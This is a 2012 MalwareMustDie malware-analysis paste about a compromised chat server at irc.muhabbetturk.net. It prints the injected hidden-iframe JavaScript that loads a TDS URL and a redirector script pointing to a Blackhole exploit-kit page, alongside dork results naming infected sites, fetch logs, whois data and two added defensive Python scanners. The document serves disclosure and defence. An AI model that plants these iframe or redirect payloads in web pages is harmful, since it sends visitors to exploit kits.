- =================================
- #MalwareMustDie!!
- 31.210.155.181 / http://irc.muhabbetturk.net/
- loaded with infectors
- Case 1 = 4 files (TDS Malware Infector)
- http://fohfynly.ru/count2.php
- Case 2 = 1 file (BHEK 2 js.js redirector to PluginDetect)
- http://q.e-tecinnovation.co.uk/links/created_danger.php
- #Hint from Hulk_crusader for case 2
- Case 1 dug up by @unixfreaxjp
- Sat Nov 10 01:13:44 JST 2012
- !! IMPORTANT!!
- Currently a major infection of case 1 ITW (in the wild)!!!
- PoC:
- // checking how far the infection has spread....
- DORK THIS ===> " 'src = 'http://fohfynly.ru/count2.php"
- About 11,700 results (0.30 seconds) ↓↓
- Online Test of Usul-e-Fiqh-1
- www.qoitrat.org/test/Usul-e-Fiqh-1/default.asp - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- Online Test of Shrh-e-Luma-2
- www.qoitrat.org/test/Shrh-e-Luma-2/default.asp - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- SR Presentation Folders - Top Class Signs and Printing
- www.topclassprinting.com/...php/.../SR-Presentation-Folders.html?...
- This site may harm your computer.
- createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; ...
- Signs and Printing | Forgot your Username?
- www.topclassprinting.com/index.php/Lost-user-name.html
- This site may harm your computer.
- (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- H2Solution
- www.h2-solution.com/index.asp?action=team - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- Feedback - Gitarattan International Business School
- gitarattan.edu.in/feedback.php - Cached
- Feedback Form <script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; ...
- Ferrari San Antonio, New and Pre-owned Ferrari and Maserati ...
- https://heroesandfantasies.com/ - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ..
- 1 2 3 4 5 6 7 8 9 10 Next
- ==================================
- <<<<<<<<<<<< P o C >>>>>>>>>>>>
- //hint
- See http://irc.muhabbetturk.net/
- ------------------------
- //making it short, got the shell.....
- $ ls -alF
- total 532
- drwxr-xr-x 8 xxxxx xxxxx 1024 Nov 10 00:17 ./
- drwxrwxrwx 6 xxxxx xxxxx 512 Nov 10 00:17 ../
- drwxr-xr-x 3 xxxxx xxxxx 512 Nov 10 00:17 _autoindex/
- -rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 cnt.php*
- -rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 count.php*
- -rwxr--r-- 1 xxxxx xxxxx 2550 Nov 3 01:08 dagitim.html*
- -rwxr--r-- 1 xxxxx xxxxx 105043 Aug 18 2011 flaxchat.cab*
- -rwxr--r-- 1 xxxxx xxxxx 169843 May 25 03:30 flaxchat.jar*
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 images/
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 nrJDKNYN/
- -rwxr--r-- 1 xxxxx xxxxx 2011 Nov 10 00:10 oyun.html*
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 photos/
- -rwxr--r-- 1 xxxxx xxxxx 3268 Nov 3 01:08 postinfo.html*
- -rwxr--r-- 1 xxxxx xxxxx 633 Aug 18 2011 setting.txt*
- drwxr-xr-x 7 xxxxx xxxxx 512 Nov 10 00:17 skins/
- -rwxr--r-- 1 xxxxx xxxxx 2524 Nov 3 01:08 sohbet.html*
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 sounds/
- -rwxr--r-- 1 xxxxx xxxxx 997 Nov 3 01:08 titresim.js*
- -rwxr--r-- 1 xxxxx xxxxx 170138 Aug 18 2011 xxflaxchat.jar*
- ---------------------------------------
- //scp flush'em out for plastic surgery...
- :
- --00:13:41-- http://irc.muhabbetturk.net/skins/mirc/?NA
- => `irc.muhabbetturk.net/skins/mirc/index.html@NA'
- Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2,573 (2.5K) [text/html]
- --00:13:42-- http://irc.muhabbetturk.net/skins/mirc/?MD
- => `irc.muhabbetturk.net/skins/mirc/index.html@MD'
- Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2,573 (2.5K) [text/html]
- --00:13:43-- http://irc.muhabbetturk.net/skins/mirc/?SD
- => `irc.muhabbetturk.net/skins/mirc/index.html@SD'
- Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2,573 (2.5K) [text/html]
- :
- ===========================
- // infector files...
- 1) Infector pointing to the TDS malware CnC
- URL: http://fohfynly.ru/count2.php
- ===========================
- =================================================
- $ cat /dagitim.html (TDS Malware Infection scheme...)
- =================================================
- <script language="JavaScript1.2">
- function shake(n) {
- if (parent.moveBy) {
- for (i = 10; i > 0; i--) {
- for (j = n; j > 0; j--) {
- parent.moveBy(0,i);
- parent.moveBy(i,0);
- parent.moveBy(0,-i);
- parent.moveBy(-i,0);
- }
- }
- }
- }
- </script>
- <applet name="Flaxchat" code="flaxchat.FlaxChat.class"
- archive ="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt
- .jar,flaxgammon.jar"
- width ="100%"
- height ="400"
- codebase = "http://irc.muhabbetturk.net">
- <param name="CABBASE" value="flaxchat.cab">
- <param name="ident" value="flaxchat">
- <param name="fullname" value="Flaxchat">
- <param name="nickname" value="">
- <param name="Channel1" value="#sohbet,#oyun">
- <p>Java uygulaması kurulu değil.Java yuklemek icin <a href="http://www.flaxchat.com/?getjava">chat applet</a></p><!--d1752c--><script type="text/javascript" language="javascript" >
- // (Turkish: "The Java application is not installed. To install Java: chat applet"; the <!--d1752c--> block that follows is the injected code)
- :
- blah...
- ---------------------------------------------
- //simulate....
- [2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Status: 200, Referrer: None
- )[2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Content-type: text/html, MD
- 5: 12154dbf36908011e17fcbd7a93b007b)
- [2012-11-10 00:14:17] <applet archive="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar" code="flaxchat.FlaxChat.class" codebase="http://irc.muhabbetturk.net" height="400" name="Flaxchat" width="100%">
- <param name="CABBASE" value="flaxchat.cab"></param>
- <param name="ident" value="flaxchat"></param>
- <param name="fullname" value="Flaxchat"></param>
- <param name="nickname" value=""></param>
- <param name="Channel1" value="#sohbet,#oyun"></param>
- <p>Java uygulaması kurulu değil.Java yuklemek icin <a href="http://www.flaxchat.com/?getjava">chat applet</a></p><!--d1752c--><script language="javascript" type="text/javascript"> (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->
- </applet>
- [2012-11-10 00:14:17] [Navigator URL Translation] flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar --> http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
- [2012-11-10 00:14:18] [HTTP] URL: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar (Status: 404, Referrer: http://irc.muhabbetturk.net/dagitim.html)
- [2012-11-10 00:14:18] FileNotFoundError: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
- [2012-11-10 00:14:18] Unhandled script language: javascript1.2
- [2012-11-10 00:14:18] <param name="CABBASE" value="flaxchat.cab"></param>
- [2012-11-10 00:14:18] <param name="ident" value="flaxchat"></param>
- [2012-11-10 00:14:18] <param name="fullname" value="Flaxchat"></param>
- [2012-11-10 00:14:18] <param name="nickname" value=""></param>
- [2012-11-10 00:14:18] <param name="Channel1" value="#sohbet,#oyun"></param>
- [2012-11-10 00:14:33] <iframe src="http://fohfynly.ru/count2.php"></iframe> <=============BINGO!!!!!!!!!!!!!!!
- [2012-11-10 00:14:33] [iframe redirection] http://irc.muhabbetturk.net/dagitim.html -> http://fohfynly.ru/count2.php <=============BINGO!!!!!!!!!!!!!!!
- ---------------------------------------------
- // Infection #1 found : http://fohfynly.ru/count2.php
- // checking....
- --00:25:05-- http://fohfynly.ru/count2.php
- => `./sample'
- Resolving fohfynly.ru... failed: Unknown host.
- //reference #1....
- http://urlquery.net/report.php?id=91654
- URL http://fohfynly.ru/count2.php
- IP 78.96.77.179
- ASN AS6830 UPC Broadband Holding B.V.
- Location [Romania] Romania
- Report completed 2012-11-05 16:41:59 CET
- Status Report complete.
- urlQuery Alerts Detected a TDS URL pattern
- //http requests.... (urlQuery capture; request and Host on the left, response on the right)
- GET /count2.php HTTP/1.1    Host: fohfynly.ru              -> HTTP/1.1 302
- GET /billing.php HTTP/1.1   Host: na-igre.pp.ua            -> HTTP/1.1 200 OK, Content-Type: text/html
- GET /ga.js HTTP/1.1         Host: www.google-analytics.com -> HTTP/1.1 200 OK, Content-Type: text/javascript
- GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=885136485&utmhn=na-igre.pp.ua&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=1176x761&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmhid=2033196436&utmr=-&utmp=%2Fbilling.php&utmac=UA-7382389-46&utmcc=__utma%3D119089686.1353519843.1352130089.1352130089.1352130089.1%3B%2B__utmz%3D119089686.1352130089.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1
-                             Host: www.google-analytics.com -> HTTP/1.1 200 OK, Content-Type: image/gif
- GET /favicon.ico HTTP/1.1   Host: na-igre.pp.ua            -> HTTP/1.1 302 Found, Content-Type: text/html; charset=iso-8859-1
- GET /error404/ HTTP/1.1     Host: www.host1free.com        -> HTTP/1.1 200 OK, Content-Type: text/html; charset=UTF-8 // currently unregistered domain....
- //elinks snaps...
- # Error 404 - Page Not Found (p1 of 4) // currently unregistered domain....
- # Host1Free Banners Free Hosting
- host1free.com
- Sign-Up For Free Web Hosting! Login to Control Panel
- Free Web Hosting is Powered by HOST1PLUS
- * Free Hosting
- * Features
- * Affiliates
- * Forum / Support
- * Blog
- * Upgrades
- * Free VPS
- VPS Hosting
- Web Hosting
- //reference #2
- URL http://fohfynly.ru/count2.php
- IP 189.214.146.232
- ASN AS28554 Cablemas Telecomunicaciones SA de CV
- Location [Mexico] Mexico
- Report completed 2012-11-02 20:33:26 CET
- Status Report complete.
- urlQuery Alerts Detected a TDS URL pattern
- // whois check...fohfynly.ru....
- domain: FOHFYNLY.RU
- nserver: ns1.systeat.com.
- nserver: ns2.systeat.com.
- nserver: ns3.systeat.com.
- nserver: ns4.systeat.com.
- nserver: ns5.systeat.com.
- nserver: ns6.systeat.com.
- state: REGISTERED, NOT DELEGATED, UNVERIFIED
- person: Private Person
- registrar: REGGI-REG-RIPN
- admin-contact: http://www.webdrive.ru/webmail/
- created: 2012.11.01
- paid-till: 2013.11.01
- free-date: 2013.12.02
- source: TCI
- Last updated on 2012.11.09 19:41:38 MSK <============== JUST CHANGED
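- // Added example, not part of this paste or the MalwareMustDie analysis: a small triage routine that parses the RIPN-style whois record above and turns the things the analyst is pointing at (created 2012.11.01, state NOT DELEGATED / UNVERIFIED, a "Private Person" registrant, record touched the day before the check) into flags. The 30-day "young domain" threshold is an assumption; the embedded record is a trimmed copy of the output above, constructed for the example.

```python
"""Whois triage for a suspected TDS domain (added example, not from the paste).

Parses the RIPN/TCI whois layout quoted above and flags the indicators that
make fohfynly.ru look like throwaway malware infrastructure.
"""
import re
from datetime import datetime

YOUNG_DAYS = 30          # assumption: registrations this fresh deserve a look
UPDATED_RE = re.compile(r"^Last updated on (\d{4}\.\d{2}\.\d{2})")

# Constructed sample, trimmed from the whois output quoted in this paste.
SAMPLE_WHOIS = """\
domain: FOHFYNLY.RU
nserver: ns1.systeat.com.
nserver: ns2.systeat.com.
state: REGISTERED, NOT DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: http://www.webdrive.ru/webmail/
created: 2012.11.01
paid-till: 2013.11.01
free-date: 2013.12.02
source: TCI
Last updated on 2012.11.09 19:41:38 MSK
"""


def parse_ru_whois(text):
    """'key: value' lines to a dict; repeated nserver lines go into a list."""
    rec = {"nserver": []}
    for line in text.splitlines():
        m = UPDATED_RE.match(line)
        if m:                       # trailer line, not in 'key:' form
            rec["updated"] = m.group(1)
            continue
        key, sep, val = line.partition(":")
        if not sep:
            continue
        key, val = key.strip().lower(), val.strip()
        if key == "nserver":
            rec["nserver"].append(val.rstrip("."))
        else:
            rec[key] = val
    return rec


def _day(s):
    return datetime.strptime(s, "%Y.%m.%d").date()


def triage_domain(text, observed):
    """observed is 'YYYY.MM.DD', the day the record was pulled (here 2012.11.10)."""
    rec = parse_ru_whois(text)
    seen = _day(observed)
    age = (seen - _day(rec["created"])).days
    states = {s.strip().upper() for s in rec.get("state", "").split(",")}
    flags = []
    if age <= YOUNG_DAYS:
        flags.append(f"young: registered {age} days before observation")
    if "NOT DELEGATED" in states:
        flags.append("not delegated: no live NS delegation, which is why the name fails to resolve")
    if "UNVERIFIED" in states:
        flags.append("unverified: registrant identity not confirmed by the registrar")
    if rec.get("person", "").lower() == "private person":
        flags.append("privacy-protected registrant")
    if "updated" in rec and (seen - _day(rec["updated"])).days <= 1:
        flags.append("record changed within a day of observation")
    return {"domain": rec.get("domain"), "age_days": age,
            "nserver": rec["nserver"], "flags": flags}


if __name__ == "__main__":
    r = triage_domain(SAMPLE_WHOIS, "2012.11.10")
    print(r["domain"], f"age={r['age_days']}d", *r["nserver"])
    for f in r["flags"]:
        print(" -", f)
```

- // Run it with the observation date of the check; on this record every one of the five flags fires, which is the picture of a domain stood up for one campaign and already being pulled when the analyst looked.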
- =================================================
- $ cat /postinfo.html ; cat /sohbet.html ; cat /titresim.js
- (TDS Malware Infectors...)
- =================================================
- :
- <!--d1752c--><script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe');
- a.src = 'http://fohfynly.ru/count2.php'; <=================================#w000t!!! Bingo!!
- a.style.position = 'absolute';
- a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px';
- a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>');
- document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->
- :
- /*d1752c*/
- (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0';
- a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px';
- if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();
- /*/d1752c*/
- =================================================
- // infector files...
- 2) BHEK2 js.js infector...
- See nrJDKNYN folder of: http://irc.muhabbetturk.net/
- $ cat /nrJDKNYN/js.js
- =================================================
- document.location='http://q.e-tecinnovation.co.uk/links/created_danger.php';
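- // Added example, not part of this paste or the MalwareMustDie analysis: a Python scanner for a copied web root that finds both implants seen on this server, the marker-wrapped hidden-iframe loader (<!--d1752c--> ... <!--/d1752c--> in the .html files, /*d1752c*/ ... /*/d1752c*/ in titresim.js) and the bare document.location redirector dropped as nrJDKNYN/js.js, and reports the target URL per file. The scanned extensions, the 10px "hidden" threshold and the six-hex-character marker shape are assumptions generalised from what this server shows; the sample strings are constructed from the snippets quoted above.

```python
"""Find injected iframe loaders and drop-in redirectors in a copied web root.

Added example, not part of the original paste. Assumptions: the injector wraps
its block in a 6-hex-char id in an HTML or JS comment pair, and the iframe it
builds is at most HIDDEN_PX on a side (the samples here use 2px).
"""
import os
import re
import sys
from dataclasses import dataclass

SCAN_EXT = {".html", ".htm", ".js", ".php", ".asp", ".aspx"}  # assumption
HIDDEN_PX = 10                                               # assumption

# <!--d1752c--> ... <!--/d1752c-->  (HTML)   or   /*d1752c*/ ... /*/d1752c*/  (JS)
MARKER_RE = re.compile(
    r"<!--(?P<h>[0-9a-f]{6})-->(?P<hbody>.*?)<!--/(?P=h)-->"
    r"|/\*(?P<j>[0-9a-f]{6})\*/(?P<jbody>.*?)/\*/(?P=j)\*/",
    re.S | re.I,
)
IFRAME_SRC_RE = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")
PX_RE = re.compile(r"""\.style\.(?:height|width)\s*=\s*['"](\d+)px['"]""")
# a file that is nothing but  document.location='...';  (the js.js case)
STANDALONE_REDIRECT_RE = re.compile(r"""^\s*document\.location\s*=\s*['"]([^'"]+)['"]\s*;?\s*$""")
LOCATION_RE = re.compile(r"""document\.location\s*=\s*['"]([^'"]+)['"]""")


@dataclass
class Finding:
    path: str
    kind: str    # hidden-iframe | iframe | standalone-redirector | location-redirect
    marker: str  # injector id, "" when there is none
    url: str


def scan_text(path, text):
    """Return the Finding list for one file's content."""
    found = []
    for m in MARKER_RE.finditer(text):
        marker = (m.group("h") or m.group("j")).lower()
        body = m.group("hbody") if m.group("h") else m.group("jbody")
        src = IFRAME_SRC_RE.search(body)
        if not src:
            continue
        sizes = [int(px) for px in PX_RE.findall(body)]
        kind = "hidden-iframe" if sizes and max(sizes) <= HIDDEN_PX else "iframe"
        found.append(Finding(path, kind, marker, src.group(1)))
    m = STANDALONE_REDIRECT_RE.match(text)
    if m:
        found.append(Finding(path, "standalone-redirector", "", m.group(1)))
    else:
        # document.location assignments inside larger files are common in
        # legitimate code, so these are reported for review, not as verdicts
        for m in LOCATION_RE.finditer(text):
            found.append(Finding(path, "location-redirect", "", m.group(1)))
    return found


def scan_tree(root):
    """Walk a web root and scan every file with an interesting extension."""
    found = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found.extend(scan_text(path, fh.read()))
            except OSError:
                pass
    return found


# Constructed sample inputs, cut down from the snippets quoted in this paste.
SAMPLE_HTML = (
    "<p>chat applet</p><!--d1752c--><script type=\"text/javascript\" > (function(){"
    " var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php';"
    " a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px';"
    " a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px';"
    " if(!document.getElementById('mira')) { document.write('<div id=\\'mira\\'></div>');"
    " document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c--></applet>"
)
SAMPLE_JS = (
    "/*d1752c*/\n(function(){ var a = document.createElement('iframe');"
    " a.src = 'http://fohfynly.ru/count2.php'; a.style.height = '2px';"
    " a.style.width = '2px'; })();\n/*/d1752c*/\n"
)
SAMPLE_REDIRECT = "document.location='http://q.e-tecinnovation.co.uk/links/created_danger.php';\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:
        results = (scan_text("dagitim.html", SAMPLE_HTML)
                   + scan_text("titresim.js", SAMPLE_JS)
                   + scan_text("nrJDKNYN/js.js", SAMPLE_REDIRECT))
    for f in results:
        print(f"{f.path}: {f.kind} marker={f.marker or '-'} -> {f.url}")
```

- // Point it at the directory you pulled down with scp and it lists every file carrying the d1752c block plus the target it loads; run without an argument it walks the built-in samples. The marker id is worth keeping in the report: the same id in every infected file is what lets the injector find and update its own code later, and it is also the fastest thing to grep for across other hosts on the same server.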
- //accessing... with or without you....NO! tor...
- --01:09:02-- http://q.e-tecinnovation.co.uk/links/created_danger.php
- => `./sample'
- Resolving q.e-tecinnovation.co.uk... failed: Unknown host.
- //reference... as per expected BHEK2.......
- URL http://q.e-tecinnovation.co.uk/links/created_danger.php
- IP 74.91.118.239
- ASN AS12182 Internap Network Services Corporation
- Location [United States] United States
- Report completed 2012-11-06 16:28:30 CET
- Status Report complete.
- urlQuery Alerts Detected BlackHole v2.0 exploit kit URL pattern
- ====================
- #MalwareMustDie!
- Sat Nov 10 01:13:44 JST 2012
- *) This is a team work effort!